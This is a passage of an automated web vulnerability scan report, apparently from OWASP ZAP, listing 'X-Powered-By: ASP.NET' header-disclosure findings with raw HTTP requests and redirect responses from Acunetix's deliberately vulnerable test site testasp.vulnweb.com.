align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 399 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3256 |
| Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 398 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 222 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Search.asp?tfSearch=ZAP Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 145 |
| Response Body - size: 145 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Search.asp?tfSearch=ZAP">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 388 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 388 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 388 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=10 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=10">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=11 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=11">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=12 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=12">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=13 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=13">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=14 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=14">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=15 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=15">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=16 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=16">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=17 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=17">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=18 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=18">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=19 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=19">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=20 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=20">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=21 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=21">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=22 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=22">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=23 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=23">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=24 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 142 |
